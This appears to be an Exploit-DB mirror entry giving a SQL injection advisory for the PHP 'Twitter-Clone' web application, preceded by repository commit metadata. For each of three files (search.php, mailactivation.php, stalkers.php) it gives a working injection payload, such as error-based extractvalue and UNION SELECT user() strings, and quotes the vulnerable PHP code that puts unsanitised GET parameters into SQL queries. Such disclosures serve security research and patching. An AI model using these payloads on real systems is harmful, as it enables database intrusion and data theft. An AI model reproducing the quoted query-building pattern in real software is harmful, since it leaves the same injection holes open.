exploit-db-mirror/exploits/php/webapps/45247.txt
Offensive Security 4d43b968d8 DB: 2018-08-24
7 changes to exploits/shellcodes

CuteFTP 8.3.1 - Denial of Service (PoC)
Epiphany Web Browser 3.28.1 - Denial of Service (PoC)

StyleWriter 4 1.0 - Denial of Service (PoC)

CMS ISWEB 3.5.3 - Directory Traversal
Twitter-Clone 1 - 'code' SQL Injection
PCViewer vt1000 - Directory Traversal
2018-08-24 05:01:53 +00:00

64 lines
No EOL
1.5 KiB
Text

# Exploit Title: Twitter-Clone 1 - 'code' SQL Injection
# Date: 2018-08-22
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/Fyffe/PHP-Twitter-Clone/
# Version: 1
# CVE: N/A
# Tested on: Win 10
# vulnerable files : [mailactivation.php , stalkers.php , search.php]
# vulnerable parameters : [name , code , id]
# 1) search.php :
# vulnerable parameter : name
# Type : Error-based
# Payload :
%' AND extractvalue(1,concat(0x3a,database(),0x3a))%23
# vulnerable code :
if($_GET['name']!=""){
$what = $_GET['name'];
include "connect.php";
$users = mysqli_query($con, "SELECT id, username, followers, following,
tweets
FROM users
WHERE username LIKE '%$what%'
ORDER BY username ASC
LIMIT 0, 10
");
# 2) mailactivation.php :
# vulnerable parameter : code
# Type : Union query
# Payload :
' UNION SELECT 1,user(),3,4,5,6%23
# vulnerable code :
include "connect.php";
$givenname = $_GET['username'];
$givencode = $_GET['code'];
$query = mysqli_query($con, "SELECT code, active
FROM users
WHERE code = '$givencode' AND username = '$givenname'
");
$row = mysqli_fetch_assoc($query);
$wantedcode = $row['code'];
# 3) stalkers.php :
# vulnerable parameter : id
# Type : Union query
# Payload :
' UNION SELECT 1,2,user(),4,5,6
# vulnerable code :
if ($_GET['id'] != "") {
$theid = $_GET['id'];
include "connect.php";
$stalked = mysqli_query($con, "SELECT id, username, followers, following
FROM users
WHERE id = '$theid'
");
$row1 = mysqli_fetch_assoc($stalked);
$usern = $row1['username'];